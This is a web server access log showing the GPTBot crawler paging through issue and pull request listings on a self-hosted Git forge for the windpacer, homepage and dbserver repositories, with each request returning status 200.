"https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10067] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10254] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10246] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10083] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10248] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10244] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10081] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10082] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:19:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9958] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10170] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9950] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:19:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=open&type=all" +[17/Feb/2026:19:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=latest&state=closed&type=all" +[17/Feb/2026:19:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10129] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&state=all&type=all" +[17/Feb/2026:19:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:19:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md?display=source" [Client 74.7.227.38] [Length 24249] [Gzip 6.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/README_WINDOWS.md" +[17/Feb/2026:19:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:19:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:19:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 